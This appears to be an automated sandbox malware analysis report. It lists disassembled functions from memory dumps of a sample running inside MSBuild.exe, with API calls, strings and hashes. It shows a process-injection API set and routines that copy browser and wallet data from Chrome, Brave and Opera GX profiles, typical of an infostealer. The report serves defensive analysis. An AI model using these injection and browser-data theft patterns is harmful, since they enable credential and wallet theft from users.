Instruction Fuzzy Hash: C4D0A73134A7741BD714617E6458797BECB8B49624F04005EE54D83382D94A180442AA

Function 07232540 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4400891558.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7230000_http147.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04c005ebf716c83f2aed801f38aa70311368734b30a95d8581f7baabe2726a39
Instruction ID: 3d79e9f86cf5ab1baacfa5b32bb0ccdbb1a61807948d965e24600934418c750c
Opcode Fuzzy Hash: 04c005ebf716c83f2aed801f38aa70311368734b30a95d8581f7baabe2726a39
Instruction Fuzzy Hash: 67D012F077430FCADE2CE1B5173023672DC7E41100F1065679907DA150EA95CA4541B6

Function 07236E10 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4400891558.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7230000_http147.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57847c77deb518698ac7231f06ea86284caa83f14d89a6eb3e94d6bc1094ad91
Instruction ID: d6c628c1b9d1a7542cc73ac37de6beaf79f653e53f7f7fc87f28c568612bf4db
Opcode Fuzzy Hash: 57847c77deb518698ac7231f06ea86284caa83f14d89a6eb3e94d6bc1094ad91
Instruction Fuzzy Hash: B8D0A7F2524760AFC7225B28E81474177F4AB47200F0B06CBD0C0872D2D359DD4E8791

Function 07238438 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4400891558.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7230000_http147.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 833b87b39cc1ee2a24c47e99036c64604080b7682592c7ddbda3ad3f7a451c60
Instruction ID: 44e4967eb1f3492e04f787bb3005404498198517392f0f156d74b240ad61505b
Opcode Fuzzy Hash: 833b87b39cc1ee2a24c47e99036c64604080b7682592c7ddbda3ad3f7a451c60
Instruction Fuzzy Hash: 5CE0C79282E7C05ED302AB30C82924ABF70AF23200F4A84EBC0C08B0A3E0088818D752

Function 07233054 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4400891558.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7230000_http147.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9a1af8788d293b543e69ff625f2edaaf16fd4bd6f0be02857aaebbc57add850
Instruction ID: c5fc801367f4588b40c6388b8afaab8baef77b72f6071ba53b9d6eed161effe2
Opcode Fuzzy Hash: d9a1af8788d293b543e69ff625f2edaaf16fd4bd6f0be02857aaebbc57add850
Instruction Fuzzy Hash: D8D012F4230621DFCB20AB2CE184A6AB6E9EB49311F054E5AE04297248C7A5EC4D8695

Function 07238460 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4400891558.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7230000_http147.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc45c83d16dd465df2a8e1661b3db871f1aa90da4113f2bf70a4603db6587454
Instruction ID: bd14705ddb5cee4eb4e56d40b8778ccfa3db6f78c4b46d62c987698f1bbd2e79
Opcode Fuzzy Hash: dc45c83d16dd465df2a8e1661b3db871f1aa90da4113f2bf70a4603db6587454
Instruction Fuzzy Hash: 3CD05E34149280AFC346CF24D818CA57F71AF56210B1480E3E484CF777C3318912DB10

Function 0723D6F8 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4400891558.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7230000_http147.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f37958b1fc5cf9212d4b4407168c82066ef60cf4dc542e05af06e7ddc3ffc90d
Instruction ID: 1451254a189b0f64b038edc3d6d6e8a6ffe88516176c87f298b03a7aee1bce10
Opcode Fuzzy Hash: f37958b1fc5cf9212d4b4407168c82066ef60cf4dc542e05af06e7ddc3ffc90d
Instruction Fuzzy Hash: 69C09BB5178100EECE01B754C784C25FAE5FF55701B80CC51A14545034C721C828EB16

Function 07238470 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4400891558.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7230000_http147.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d6f2623337c38ef8749255ff78b3cbedb78fba73e040c9434c39499d8169e63
Instruction ID: 61412fa5721fa0801f19765b42d0f6ac58f054d2697597a3f249e516f761f0d5
Opcode Fuzzy Hash: 1d6f2623337c38ef8749255ff78b3cbedb78fba73e040c9434c39499d8169e63
Instruction Fuzzy Hash: 87C00235140108AFC740DF55D445D95BBA9EB59660B1180A1F9484B722C632E9119A90

Function 0723DA1F Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4400891558.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7230000_http147.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae7f488b52a5561cd89c62ca62b5b737982889b7cc70b4bc274cde3ec3628aaa
Instruction ID: bb7b989e7098385a1f1791863928907fb7518a981b86074825220c030b23b33f
Opcode Fuzzy Hash: ae7f488b52a5561cd89c62ca62b5b737982889b7cc70b4bc274cde3ec3628aaa
Instruction Fuzzy Hash: 9EA001BA221040AEAA467B60D905E05BAA6FBA5609389C191A1446A171CA22D428EB12

Function 0723401A Relevance: .0, Instructions: 3COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4400891558.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7230000_http147.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71f44616e7a02cf75d32a05df9ea01ef19aa0f7a80b937fb3c01cb93520202d6
Instruction ID: 06ae7d79a43c98f70c841912d7ed07cc21da3bbb223f63256a4a38f5ba9b57d6
Opcode Fuzzy Hash: 71f44616e7a02cf75d32a05df9ea01ef19aa0f7a80b937fb3c01cb93520202d6
Instruction Fuzzy Hash:

Analysis Process: MSBuild.exePID: 6916, Parent PID: 7112COMMON

Execution Graph

Execution Coverage:	5.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	1.8%
Total number of Nodes:	2000
Total number of Limit Nodes:	21

Executed Functions

Function 00418A63 Relevance: 231.5, APIs: 121, Strings: 11, Instructions: 518
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(74DD0000,004173DA), ref: 00418A77
GetProcAddress.KERNEL32 ref: 00418A8E
GetProcAddress.KERNEL32 ref: 00418AA5
GetProcAddress.KERNEL32 ref: 00418ABC
GetProcAddress.KERNEL32 ref: 00418AD3
GetProcAddress.KERNEL32 ref: 00418AEA
GetProcAddress.KERNEL32 ref: 00418B01
GetProcAddress.KERNEL32 ref: 00418B18
GetProcAddress.KERNEL32 ref: 00418B2F
GetProcAddress.KERNEL32 ref: 00418B46
GetProcAddress.KERNEL32 ref: 00418B5D
GetProcAddress.KERNEL32 ref: 00418B74
GetProcAddress.KERNEL32 ref: 00418B8B
GetProcAddress.KERNEL32 ref: 00418BA2
GetProcAddress.KERNEL32 ref: 00418BB9
GetProcAddress.KERNEL32 ref: 00418BD0
GetProcAddress.KERNEL32 ref: 00418BE7
GetProcAddress.KERNEL32 ref: 00418BFE
GetProcAddress.KERNEL32 ref: 00418C15
GetProcAddress.KERNEL32 ref: 00418C2C
GetProcAddress.KERNEL32 ref: 00418C43
GetProcAddress.KERNEL32 ref: 00418C5A
GetProcAddress.KERNEL32 ref: 00418C71
GetProcAddress.KERNEL32 ref: 00418C88
GetProcAddress.KERNEL32 ref: 00418C9F
GetProcAddress.KERNEL32 ref: 00418CB6
GetProcAddress.KERNEL32 ref: 00418CCD
GetProcAddress.KERNEL32 ref: 00418CE4
GetProcAddress.KERNEL32 ref: 00418CFB
GetProcAddress.KERNEL32 ref: 00418D12
GetProcAddress.KERNEL32 ref: 00418D29
GetProcAddress.KERNEL32 ref: 00418D40
GetProcAddress.KERNEL32 ref: 00418D57
GetProcAddress.KERNEL32 ref: 00418D6E
GetProcAddress.KERNEL32 ref: 00418D85
GetProcAddress.KERNEL32 ref: 00418D9C
GetProcAddress.KERNEL32 ref: 00418DB3
GetProcAddress.KERNEL32 ref: 00418DCA
GetProcAddress.KERNEL32 ref: 00418DE1
GetProcAddress.KERNEL32 ref: 00418DF8
GetProcAddress.KERNEL32 ref: 00418E0F
GetProcAddress.KERNEL32 ref: 00418E26
GetProcAddress.KERNEL32 ref: 00418E3D
GetProcAddress.KERNEL32(CreateProcessA), ref: 00418E53
GetProcAddress.KERNEL32(GetThreadContext), ref: 00418E69
GetProcAddress.KERNEL32(ReadProcessMemory), ref: 00418E7F
GetProcAddress.KERNEL32(VirtualAllocEx), ref: 00418E95
GetProcAddress.KERNEL32(ResumeThread), ref: 00418EAB
GetProcAddress.KERNEL32(WriteProcessMemory), ref: 00418EC1
GetProcAddress.KERNEL32(SetThreadContext), ref: 00418ED7
LoadLibraryA.KERNEL32(004173DA), ref: 00418EE8
LoadLibraryA.KERNEL32 ref: 00418EF9
LoadLibraryA.KERNEL32 ref: 00418F0A
LoadLibraryA.KERNEL32 ref: 00418F1B
LoadLibraryA.KERNEL32 ref: 00418F2C
LoadLibraryA.KERNEL32 ref: 00418F3D
LoadLibraryA.KERNEL32 ref: 00418F4E
LoadLibraryA.KERNEL32 ref: 00418F5F
LoadLibraryA.KERNEL32(dbghelp.dll), ref: 00418F6F
GetProcAddress.KERNEL32(75290000), ref: 00418F8A
GetProcAddress.KERNEL32 ref: 00418FA1
GetProcAddress.KERNEL32 ref: 00418FB8
GetProcAddress.KERNEL32 ref: 00418FCF
GetProcAddress.KERNEL32 ref: 00418FE6
GetProcAddress.KERNEL32(73B00000), ref: 00419005
GetProcAddress.KERNEL32 ref: 0041901C
GetProcAddress.KERNEL32 ref: 00419033
GetProcAddress.KERNEL32 ref: 0041904A
GetProcAddress.KERNEL32 ref: 00419061
GetProcAddress.KERNEL32 ref: 00419078
GetProcAddress.KERNEL32 ref: 0041908F
GetProcAddress.KERNEL32 ref: 004190A6
GetProcAddress.KERNEL32(752C0000), ref: 004190C1
GetProcAddress.KERNEL32 ref: 004190D8
GetProcAddress.KERNEL32 ref: 004190EF
GetProcAddress.KERNEL32 ref: 00419106
GetProcAddress.KERNEL32 ref: 0041911D
GetProcAddress.KERNEL32(74EC0000), ref: 0041913C
GetProcAddress.KERNEL32 ref: 00419153
GetProcAddress.KERNEL32 ref: 0041916A
GetProcAddress.KERNEL32 ref: 00419181
GetProcAddress.KERNEL32 ref: 00419198
GetProcAddress.KERNEL32 ref: 004191AF
GetProcAddress.KERNEL32(75BD0000), ref: 004191CE
GetProcAddress.KERNEL32 ref: 004191E5
GetProcAddress.KERNEL32 ref: 004191FC
GetProcAddress.KERNEL32 ref: 00419213
GetProcAddress.KERNEL32 ref: 0041922A
GetProcAddress.KERNEL32 ref: 00419241
GetProcAddress.KERNEL32 ref: 00419258
GetProcAddress.KERNEL32 ref: 0041926F
GetProcAddress.KERNEL32 ref: 00419286
GetProcAddress.KERNEL32(75A70000), ref: 004192A1
GetProcAddress.KERNEL32 ref: 004192B8
GetProcAddress.KERNEL32 ref: 004192CF
GetProcAddress.KERNEL32 ref: 004192E6
GetProcAddress.KERNEL32 ref: 004192FD
GetProcAddress.KERNEL32(75450000), ref: 00419318
GetProcAddress.KERNEL32 ref: 0041932F
GetProcAddress.KERNEL32(75DA0000), ref: 0041934A
GetProcAddress.KERNEL32 ref: 00419361
GetProcAddress.KERNEL32(6F070000), ref: 00419380
GetProcAddress.KERNEL32 ref: 00419397
GetProcAddress.KERNEL32 ref: 004193AE
GetProcAddress.KERNEL32 ref: 004193C5
GetProcAddress.KERNEL32 ref: 004193DC
GetProcAddress.KERNEL32 ref: 004193F3
GetProcAddress.KERNEL32 ref: 0041940A
GetProcAddress.KERNEL32 ref: 00419421
GetProcAddress.KERNEL32(HttpQueryInfoA), ref: 00419437
GetProcAddress.KERNEL32(InternetSetOptionA), ref: 0041944D
GetProcAddress.KERNEL32(75AF0000), ref: 00419468
GetProcAddress.KERNEL32 ref: 0041947F
GetProcAddress.KERNEL32 ref: 00419496
GetProcAddress.KERNEL32 ref: 004194AD
GetProcAddress.KERNEL32(75D90000), ref: 004194C8
GetProcAddress.KERNEL32(6F800000), ref: 004194E3
GetProcAddress.KERNEL32 ref: 004194FA
GetProcAddress.KERNEL32 ref: 00419511
GetProcAddress.KERNEL32 ref: 00419528
GetProcAddress.KERNEL32(6C2B0000,SymMatchString), ref: 00419542

Strings

dbghelp.dll, xrefs: 00418F65
CreateProcessA, xrefs: 00418E43
HttpQueryInfoA, xrefs: 00419427
WriteProcessMemory, xrefs: 00418EB1
ReadProcessMemory, xrefs: 00418E6F
ResumeThread, xrefs: 00418E9B
VirtualAllocEx, xrefs: 00418E85
GetThreadContext, xrefs: 00418E59
InternetSetOptionA, xrefs: 0041943D
SetThreadContext, xrefs: 00418EC7
SymMatchString, xrefs: 0041953C

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: CreateProcessA$GetThreadContext$HttpQueryInfoA$InternetSetOptionA$ReadProcessMemory$ResumeThread$SetThreadContext$SymMatchString$VirtualAllocEx$WriteProcessMemory$dbghelp.dll
API String ID: 2238633743-2740034357
Opcode ID: 3e30b89850b8473fc7cede02b6692b6796462800fa081e8782096f790b2d890e
Instruction ID: 8ba0d5c8ae2e13c06544b1593b83c2cece409b0c910b42dbc8887f4207037caa
Opcode Fuzzy Hash: 3e30b89850b8473fc7cede02b6692b6796462800fa081e8782096f790b2d890e
Instruction Fuzzy Hash: C752F475910312AFEF1ADFA0FD088243BA7F718707F11A466E91582270E73B4A64EF19

Function 00414CC8 Relevance: 49.3, APIs: 24, Strings: 4, Instructions: 297
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 00414D1C
FindFirstFileA.KERNEL32(?,?), ref: 00414D33
_memset.LIBCMT ref: 00414D4F
_memset.LIBCMT ref: 00414D60
StrCmpCA.SHLWAPI(?,004369F8), ref: 00414D81
StrCmpCA.SHLWAPI(?,004369FC), ref: 00414D9B
wsprintfA.USER32 ref: 00414DC2
StrCmpCA.SHLWAPI(?,0043660F), ref: 00414DD6
wsprintfA.USER32 ref: 00414DFF
wsprintfA.USER32 ref: 00414E16

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004176F9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004171CA,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 004105BD

_memset.LIBCMT ref: 00414E28
lstrcatA.KERNEL32(?,?), ref: 00414E3D
strtok_s.MSVCRT ref: 00414E82
_memset.LIBCMT ref: 00414E94
lstrcatA.KERNEL32(?,?), ref: 00414EA9
strtok_s.MSVCRT ref: 00414EC2
PathMatchSpecA.SHLWAPI(?,00000000), ref: 00414ED7
DeleteFileA.KERNEL32(?,00436A28,0043661D), ref: 00414F90
CopyFileA.KERNEL32(?,?,00000001), ref: 00414FA0

Part of subcall function 00412166: CreateFileA.KERNEL32(00414FAC,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,00414FAC,?), ref: 00412181

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00414FB6
DeleteFileA.KERNEL32(?,00000000,?,000003E8,00000000), ref: 00414FC1
strtok_s.MSVCRT ref: 00414FE7
FindNextFileA.KERNELBASE(?,?), ref: 00415105
FindClose.KERNEL32(?), ref: 00415125

Strings

%s\%s, xrefs: 00414E10
%s\%s\%s, xrefs: 00414DF9
%s\*.*, xrefs: 00414D10
%s\%s, xrefs: 00414DBC

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: File$_memsetlstrcatwsprintf$Findlstrcpystrtok_s$Delete$CloseCopyCreateFirstMatchNextPathSpecUnothrow_t@std@@@__ehfuncinfo$??2@lstrlen
String ID: %s\%s$%s\%s$%s\%s\%s$%s\*.*
API String ID: 956187361-332874205
Opcode ID: 0b980f5fe467d40f36a48e0aa954b15b20be97dd482f654baf88f773cf79a131
Instruction ID: 9768ecd297fb6e20fca964dbbce2c4256e5a8c732881b8487d541fa13927e408
Opcode Fuzzy Hash: 0b980f5fe467d40f36a48e0aa954b15b20be97dd482f654baf88f773cf79a131
Instruction Fuzzy Hash: 95C12AB1E0021AABCF22EF60DC45AEE777DAF08305F0140A6FA09A3151DB399F858F55

Function 00409D1C Relevance: 44.4, APIs: 20, Strings: 5, Instructions: 610
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041718B,004366CD,?,?,?,?,0041869F), ref: 0041050D

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004176F9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004171CA,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 004105BD

FindFirstFileA.KERNEL32(?,?,004367F2,004367EF,00437324,004367EE,?,?,?), ref: 00409DC6
StrCmpCA.SHLWAPI(?,00437328), ref: 00409DE7
StrCmpCA.SHLWAPI(?,0043732C), ref: 00409E01

Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417284,004366CF,004366CE,?,?,?,?,0041869F), ref: 0041054F
Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417284,004366CF,004366CE,?,?,?,?,0041869F), ref: 00410581

StrCmpCA.SHLWAPI(?,Opera GX,00437330,?,004367F3), ref: 00409E93
StrCmpCA.SHLWAPI(?,Brave,00437350,00437354,00437330,?,004367F3), ref: 0040A015
StrCmpCA.SHLWAPI(?,Preferences), ref: 0040A02F
CopyFileA.KERNEL32(?,?,00000001), ref: 0040A0EF
DeleteFileA.KERNEL32(?), ref: 0040A1BE
StrCmpCA.SHLWAPI(?), ref: 0040A1FC
StrCmpCA.SHLWAPI(?), ref: 0040A266
StrCmpCA.SHLWAPI(0040CCE9), ref: 0040A279

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417731), ref: 00410538

StrCmpCA.SHLWAPI(?), ref: 0040A35C
CopyFileA.KERNEL32(?,?,00000001), ref: 0040A41C
StrCmpCA.SHLWAPI(?,Google Chrome), ref: 0040A4C1
DeleteFileA.KERNEL32(?), ref: 0040A522

Part of subcall function 00408DDB: lstrlenA.KERNEL32(?), ref: 00408FD4
Part of subcall function 00408DDB: lstrlenA.KERNEL32(?), ref: 00408FEF

Part of subcall function 00409549: lstrlenA.KERNEL32(?), ref: 00409970
Part of subcall function 00409549: lstrlenA.KERNEL32(?), ref: 0040998B

StrCmpCA.SHLWAPI(?), ref: 0040A553
CopyFileA.KERNEL32(?,?,00000001), ref: 0040A613
DeleteFileA.KERNEL32(?), ref: 0040A6AA

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

FindNextFileA.KERNEL32(?,?), ref: 0040A76E
FindClose.KERNEL32(?), ref: 0040A782

Strings

\BraveWallet\Preferences, xrefs: 0040A105
Google Chrome, xrefs: 0040A4B9
Opera GX, xrefs: 00409E8B
Brave, xrefs: 0040A00D
Preferences, xrefs: 0040A023

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: File$lstrcpylstrlen$CopyDeleteFind$lstrcat$CloseFirstNextSystemTime
String ID: Brave$Google Chrome$Opera GX$Preferences$\BraveWallet\Preferences
API String ID: 4173076446-1189830961
Opcode ID: 0da3506a32181aca8fc8f354fe3ed4c146f38583c2018349b92cc3e4b9347846
Instruction ID: a9b55009a8fcddda8ff4ceb811f1237a8a6c318138ce5e2e0b09e31f0378cf4a
Opcode Fuzzy Hash: 0da3506a32181aca8fc8f354fe3ed4c146f38583c2018349b92cc3e4b9347846
Instruction Fuzzy Hash: 78422A3194012D9BCF21FB65DD46BCD7775AF04308F4101AAB848B31A2DB79AED98F89

Function 00415FD1 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 205
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 00416018
FindFirstFileA.KERNEL32(?,?), ref: 0041602F
StrCmpCA.SHLWAPI(?,00436AB4), ref: 00416050
StrCmpCA.SHLWAPI(?,00436AB8), ref: 0041606A
wsprintfA.USER32 ref: 00416091
StrCmpCA.SHLWAPI(?,00436647), ref: 004160A5
wsprintfA.USER32 ref: 004160C2
wsprintfA.USER32 ref: 004160D9
PathMatchSpecA.SHLWAPI(?,?), ref: 004160EF
lstrcatA.KERNEL32(?), ref: 00416125
lstrcatA.KERNEL32(?,00436AD0), ref: 00416137
lstrcatA.KERNEL32(?,?), ref: 0041614A
lstrcatA.KERNEL32(?,00436AD4), ref: 0041615C
lstrcatA.KERNEL32(?,?), ref: 00416170
CopyFileA.KERNEL32(?,?,00000001), ref: 00416229
DeleteFileA.KERNEL32(?), ref: 0041629D
FindNextFileA.KERNEL32(?,?), ref: 004162FF
FindClose.KERNEL32(?), ref: 00416313

Strings

%s\*, xrefs: 0041600C
%s\%s, xrefs: 004160D3
%s\%s, xrefs: 0041608B

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
String ID: %s\%s$%s\%s$%s\*
API String ID: 2178766154-445461498
Opcode ID: 6ae935164d3feafb997cd558fd705644e50460ea22fb7019366a12ba31212e16
Instruction ID: 81d09dce4b51b3523f7962b1b768db3a72bb21831e5d2f1ad6ac3091453fc6b6
Opcode Fuzzy Hash: 6ae935164d3feafb997cd558fd705644e50460ea22fb7019366a12ba31212e16
Instruction Fuzzy Hash: 3E81287190022DABCF60EF61DC45ACD77B9FB08305F0194EAE549A3150EE39AB898F94

Function 0041C585 Relevance: 26.7, APIs: 13, Strings: 2, Instructions: 440COMMON

Download Yara Rule

Strings

/, xrefs: 0041C638
UT, xrefs: 0041C8B0

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
